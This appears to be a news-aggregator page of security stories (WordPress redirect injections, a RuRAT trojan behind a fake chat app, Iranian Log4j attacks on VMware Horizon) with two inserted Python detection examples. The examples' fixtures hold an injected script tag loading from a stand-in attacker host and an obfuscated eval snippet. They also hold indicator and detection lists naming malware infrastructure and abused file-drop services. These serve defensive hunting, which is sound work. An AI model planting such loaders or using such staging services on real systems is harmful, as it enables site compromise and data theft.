"If you've visited a website in recent days and been randomly redirected to the same pages with sketchy "resources" or unwanted ads, it's likely the site in question was 1) built with WordPress tools and 2) hacked," reports Gizmodo. Details come from this blog post by researchers at Sucuri (a security provider owned by GoDaddy): As outlined in our latest hacked website report, we've been tracking a long-lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the year — for example, according to PublicWWW, the April wave for this campaign was responsible for nearly 6,000 infected websites alone. Since these PublicWWW results only show detections for simple script injections, we can assume that the scope is significantly larger.

We recently investigated a number of WordPress websites complaining about unwanted redirects. Interestingly enough, they were found to be related to a new wave of this massive campaign and were sending website visitors through a series of website redirects to serve them unwanted ads. The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files... This JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the attacker's destination.... Domains at the end of the redirect chain may be used to load advertisements, phishing pages, malware, or even more redirects....

At the time of writing, PublicWWW has reported 322 websites impacted by this new wave... Considering that this count doesn't include obfuscated malware or sites that have not yet been scanned by PublicWWW, the actual number of impacted websites is likely much higher. Our team has seen an influx in complaints for this specific wave of the massive campaign targeting WordPress sites beginning May 9th, 2022, which has impacted hundreds of websites already at the time of writing....

We expect the hackers will continue registering new domains for this ongoing campaign as soon as existing ones become blacklisted.

"It's important to note that these hacks are related to themes and plugins built by thousands of third-party developers using the open source WordPress software, not WordPress.com, which offers hosting and tools to build websites," Gizmodo points out. But it also cites this warning from Sucuri malware analyst Krasimir Konov: "This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they'll be opted in to receive unwanted ads even when the site isn't open — and ads will look like they come from the operating system, not from a browser," Konov wrote.
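The injection Sucuri describes is a script tag appended to files that should never carry one (core WordPress files, minified vendor JavaScript) or stored in database content, loading from a domain the site does not use. Below is an added example of a scanner for exactly that pattern; it is not code from Sucuri, Gizmodo or the WordPress project. The file names, their contents, the `attacker-domain.example` host and the `ALLOWED_HOSTS` allowlist are constructed for the demonstration; in practice the allowlist is the set of CDNs and domains your site legitimately loads scripts from, and the inputs are your theme/plugin/core files plus the `post_content` and `option_value` columns of the database.

```python
"""
Added example (not from Sucuri, Gizmodo or WordPress): scan WordPress files
and database rows for an external <script src=...> pointing at a host that is
not on the site's allowlist, and for inline scripts using the obfuscation
primitives redirect injections typically hide behind. All inputs constructed.
"""
import re

# Hosts the site legitimately loads scripts from (assumption for the demo).
ALLOWED_HOSTS = {"example.com", "ajax.googleapis.com"}

# <script ... src="//host/..."> or src="https://host/...", any attribute order.
SCRIPT_SRC = re.compile(
    r"<script[^>]*\ssrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+)", re.IGNORECASE)

# Inline <script> whose body reaches an obfuscation primitive before </script>.
OBFUSCATION = re.compile(
    r"<script[^>]*>(?:(?!</script>).)*?"
    r"(?:String\.fromCharCode|atob\(|unescape\(|eval\()",
    re.IGNORECASE | re.DOTALL)


def host_allowed(host, allowed):
    """Exact match or subdomain of an allowlisted host (port stripped)."""
    host = host.lower().split(":")[0]
    return any(host == a or host.endswith("." + a) for a in allowed)


def scan_content(name, text, allowed=ALLOWED_HOSTS):
    """Return [(name, line_no, reason)] for one file or one database row."""
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        host = m.group(1)
        if not host_allowed(host, allowed):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((name, line_no, f"external script from {host}"))
    for m in OBFUSCATION.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append((name, line_no, "obfuscated inline script"))
    return findings


def scan_site(files, allowed=ALLOWED_HOSTS):
    """files: mapping of name -> content; DB rows are passed the same way."""
    out = []
    for name, text in files.items():
        out.extend(scan_content(name, text, allowed))
    return out


# Constructed sample "site": one clean theme file, one core file with an
# appended loader (the pattern from the Sucuri post), one poisoned DB row.
SAMPLE_SITE = {
    "wp-includes/js/jquery/jquery.min.js":
        "/*! jQuery v3.6.0 */\n(function(){})();\n"
        "<script src='//attacker-domain.example/redirect.js'></script>\n",
    "wp-content/themes/demo/header.php":
        "<head>\n<script src=\"https://ajax.googleapis.com/ajax/libs/"
        "jquery/3.6.0/jquery.min.js\"></script>\n</head>\n",
    "wp_posts:ID=17:post_content":
        "<p>Hello</p>\n<script>eval(String.fromCharCode(118,97,114));"
        "</script>\n",
}

if __name__ == "__main__":
    for name, line_no, reason in scan_site(SAMPLE_SITE):
        print(f"{name}:{line_no}: {reason}")
```

A hit in a core or vendor file is a strong signal because those files are not supposed to change between releases; the remediation the post implies is to reinstall core and the affected theme or plugin from a clean copy and then close the vulnerability that let the attacker write to them, not merely to delete the tag. The obfuscation check is a heuristic and will flag legitimate minified code that happens to use `eval`, so treat it as a lead to review rather than proof.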
Piracy

ACE Shuts Down Massive Pirate Site After Locating Owner In Remote Peru (torrentfreak.com) 19

As part of its global anti-piracy mission, the Alliance for Creativity and Entertainment (ACE) has been trying to shut down Pelisplushd.net, a massive pirate streaming site with roughly 70 million visits per month. After tracking down its operator in the remote countryside of Peru, the anti-piracy group says the site is no more. TorrentFreak reports: In a statement published Wednesday, ACE officially announced that it was behind the closure of Pelisplushd.net. The anti-piracy group labeled the platform the second-largest Spanish-language 'rogue website' in the entire Latin American region with 383.5 million visits in the past six months and nearly 75 million visits in February 2022. In Mexico alone, the site had more visitors than hbomax.com, disneyplus.com and primevideo.com, a clear problem for those platforms which are all ACE members.

"This is a huge win for the ACE team based in Latin America as we work to protect the legitimate digital ecosystem throughout the region," said Jan van Voorn, Executive Vice President and Chief of Global Content Protection for the Motion Picture Association. "The successful action against the operator of Pelisplushd.net was only made possible because of evidence that we gathered from previous operations conducted in other countries in Latin America. This speaks volumes about ACE's ability to crack current cases utilizing years of past gathered intelligence and highlights the global, strategic approach that determines our actions around the world."

The operator of Pelisplushd is yet to be named but ACE reveals that after a positive identification, the anti-piracy group tracked him down to the "remote countryside of Peru." That took place in March and soon after, ACE says the operator agreed to turn over his domains. As far as we can tell the main domain at Pelisplushd.net is not yet completely in ACE/MPA hands but a full transfer will probably take place later.

Security

Malware Campaign Impersonates VC Firm Looking To Buy Sites (arstechnica.com) 13

BleepingComputer was recently contacted by an alleged "venture capitalist" firm that wanted to invest in or purchase our site. However, as we later discovered, this was a malicious campaign designed to install malware that provides remote access to our devices. Lawrence Abrams from BleepingComputer writes: Last week, BleepingComputer received an email to our contact form from an IP address belonging to a United Kingdom virtual server company. Writing about cybersecurity for so long, I am paranoid regarding email, messaging, and visiting unknown websites. So, I immediately grew suspicious of the email, fired up a virtual machine and VPN, and did a search for Vuxner. Google showed only a few results for 'Vuxner,' with one being for a well-designed and legitimate-looking vuxner[.]com, a site promoting "Vuxner Chat -- Next level of privacy with free instant messaging." As this appeared to be the "Vuxner chat" the threat actors referenced in their email, BleepingComputer attempted to download it and run it on a virtual machine.

BleepingComputer found that the VuxnerChat.exe download [VirusTotal] actually installs the "Trillian" messaging app and then downloads further malware onto the computer after Trillian finishes installing. As this type of campaign looked similar to other campaigns that have pushed remote access and password-stealing trojans in the past, BleepingComputer reached out to cybersecurity firm Cluster25, which has previously helped BleepingComputer diagnose similar malware attacks. Cluster25 researchers explain in a report coordinated with BleepingComputer that vuxner[.]com is hosted behind Cloudflare; however, they could still determine the hosting server's actual address at 86.104.15[.]123.

The researchers state that the Vuxner Chat program is being used as a decoy for installing a remote desktop software known as RuRAT, which is used as a remote access trojan. Once a user installs the Vuxner Trillian client and exits the installer, it will download and execute a Setup.exe executable [VirusTotal] from https://vuxner[.]com/setup.exe. When done, the victim will be left with a C:\swrbldin folder filled with a variety of batch files, VBS scripts, and other files used to install RuRAT on the device. Cluster25 told BleepingComputer that the threat actors are using this attack to gain initial access to a device and then take control over the host. Once they control the host, they can search for credentials and sensitive data or use the device as a launchpad to spread laterally in a network.

Security

VMware Horizon Servers Are Under Active Exploit By Iranian State Hackers (arstechnica.com) 17

An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.

Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: execute reconnaissance commands; create a backdoor user and add it to the network administrators group; harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.

The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.
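Both the Vuxner/RuRAT write-up above and this TunnelVision report end in the same practitioner question: what do I look for in my own logs? The two cases differ in kind. The RuRAT indicators (vuxner[.]com, 86.104.15[.]123, the C:\swrbldin staging folder) are known-bad and any hit is an incident; the five services TunnelVision abuses are legitimate, so a hit is only interesting when that host has no business reason to reach them. The added example below, which is not code from BleepingComputer, Cluster25, SentinelOne or Ars Technica, runs one hunt over constructed proxy/EDR-style log lines for both stories and scores them accordingly. The `<ts> key=value ...` log format, the hostnames, the documentation-range IPs and the per-host `EXPECTED` table are assumptions for the demo; the indicators themselves are the ones quoted in the two stories, taken in their defanged form and refanged in code.

```python
"""
Added example (not from BleepingComputer, Cluster25, SentinelOne or Ars):
hunt constructed proxy/EDR-style log lines for the RuRAT indicators from the
Vuxner story and for "unexplained outgoing connections" to the legitimate
services TunnelVision abuses. Log format, hosts and EXPECTED are assumptions.
"""
import re


def refang(s):
    """Turn the defanged forms used in write-ups ('vuxner[.]com', 'hxxps://')
    back into strings that can be matched against real log data."""
    return s.replace("[.]", ".").replace("hxxp", "http")


# Known-bad indicators from the Vuxner/RuRAT story (refanged at import time).
RURAT_DOMAINS = {refang("vuxner[.]com")}
RURAT_IPS = {refang("86.104.15[.]123")}
RURAT_PATHS = (r"c:\swrbldin",)  # dropper working folder; compared case-insensitively

# Legitimate services TunnelVision uses for staging, tooling and callbacks.
ABUSED_SERVICES = {"transfer.sh", "pastebin.com", "webhook.site",
                   "ufile.io", "raw.githubusercontent.com"}

# Hosts that are expected to reach a given service (assumed baseline).
EXPECTED = {"BUILD-01": {"raw.githubusercontent.com"}}

KV = re.compile(r"(\w+)=(\"[^\"]*\"|\S+)")


def parse_line(line):
    """'<ts> k=v k=v ...' -> dict; double-quoted values may contain spaces."""
    ts, _, rest = line.strip().partition(" ")
    ev = {"ts": ts}
    for k, v in KV.findall(rest):
        ev[k] = v.strip('"')
    return ev


def domain_matches(name, domains):
    """True if name equals or is a subdomain of any entry in domains."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)


def classify(ev, expected=EXPECTED):
    """Return (severity, reason) for one parsed event, or None."""
    host = ev.get("host", "?")
    dst = ev.get("dst", "")
    dst_ip = ev.get("dst_ip", "")
    path = ev.get("path", "")
    # Known-bad infrastructure or staging folder: any hit is an incident.
    if domain_matches(dst, RURAT_DOMAINS) or dst_ip in RURAT_IPS:
        return ("high", f"{host}: connection to RuRAT infrastructure {dst or dst_ip}")
    if path and path.lower().replace("/", "\\").startswith(RURAT_PATHS):
        return ("high", f"{host}: RuRAT staging folder touched: {path}")
    # Legitimate service: only a lead, and only for hosts with no known need.
    if dst and domain_matches(dst, ABUSED_SERVICES):
        base = next(d for d in ABUSED_SERVICES if domain_matches(dst, {d}))
        if base not in expected.get(host, set()):
            return ("medium", f"{host}: unexplained outgoing connection to {base}")
    return None


def hunt(lines, expected=EXPECTED):
    """Run classify over raw log lines; returns the list of alerts in order."""
    alerts = []
    for line in lines:
        if line.strip():
            hit = classify(parse_line(line), expected)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample log (documentation-range IPs, invented hostnames).
SAMPLE_LOG = r"""
2022-02-17T09:58:10Z host=WS-1 user=alice type=conn dst=vuxner.com dst_ip=203.0.113.10 bytes=514
2022-02-17T09:58:41Z host=WS-1 user=alice type=file_create path="C:\swrbldin\install.vbs"
2022-02-17T10:02:05Z host=BUILD-01 user=svc_ci type=conn dst=raw.githubusercontent.com dst_ip=203.0.113.20 bytes=9120
2022-02-17T10:04:12Z host=HORIZON-CS1 user=SYSTEM type=conn dst=transfer.sh dst_ip=203.0.113.30 bytes=2188321
2022-02-17T10:05:00Z host=WS-2 user=bob type=conn dst=www.example.com dst_ip=203.0.113.40 bytes=3301
2022-02-17T10:06:44Z host=WS-1 user=alice type=conn dst_ip=86.104.15.123 bytes=640
"""

if __name__ == "__main__":
    for severity, reason in hunt(SAMPLE_LOG.splitlines()):
        print(f"[{severity}] {reason}")
```

The split into "high" and "medium" is the point: a Horizon connection server pushing two megabytes to transfer.sh under SYSTEM is exactly the "unexplained" traffic the researchers mean, but the same destination from a CI runner that pulls scripts from raw.githubusercontent.com every hour is noise, and a hunt that cannot tell them apart gets ignored. The per-host expectation table is the minimum baseline; in a real deployment it comes from role, not from a hand-written dictionary.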

Government

Journalist Labeled 'Hacker' By Missouri's Governor Will Not Be Prosecuted (stltoday.com) 114

Remember when more than 100,000 Social Security numbers of Missouri teachers were revealed in the HTML code of a state web site? The St. Louis Post-Dispatch's reporter informed the state government and delayed publishing his findings until they'd fixed the hole — but the state's governor then demanded the reporter's prosecution, labelling him "a hacker." In the months that followed, throughout a probe — which for some reason was run by the state's Highway Patrol — the governor had continued to suggest that prosecution of that reporter was imminent.

But it's not. The St. Louis Post-Dispatch reports: A St. Louis Post-Dispatch journalist will not be charged after pointing out a weakness in a state computer database, the prosecuting attorney for Cole County said Friday. Prosecutor Locke Thompson issued a statement to television station KRCG Friday, saying he appreciated Gov. Mike Parson for forwarding his concerns but would not be filing charges....

Parson, who had suggested prosecution was imminent throughout the probe, issued a statement saying Thompson's office believed the decision "was properly addressed...." Post-Dispatch Publisher Ian Caso said in a statement Friday: "We are pleased the prosecutor recognized there was no legitimate basis for any charges against the St. Louis Post-Dispatch or our reporter. While an investigation of how the state allowed this information to be accessible was appropriate, the accusations against our reporter were unfounded and made to deflect embarrassment for the state's failures and for political purposes...."

There is no authorization required to examine public websites, but some researchers say overly broad hacking laws in many jurisdictions let embarrassed institutions lob hacking allegations against good Samaritans who try to flag vulnerabilities before they're exploited....

A political action committee supporting Parson ran an ad attacking the newspaper over the computer incident, saying the governor was "standing up to the fake news media."

Thanks to long-time Slashdot reader UnknowingFool for submitting the story.
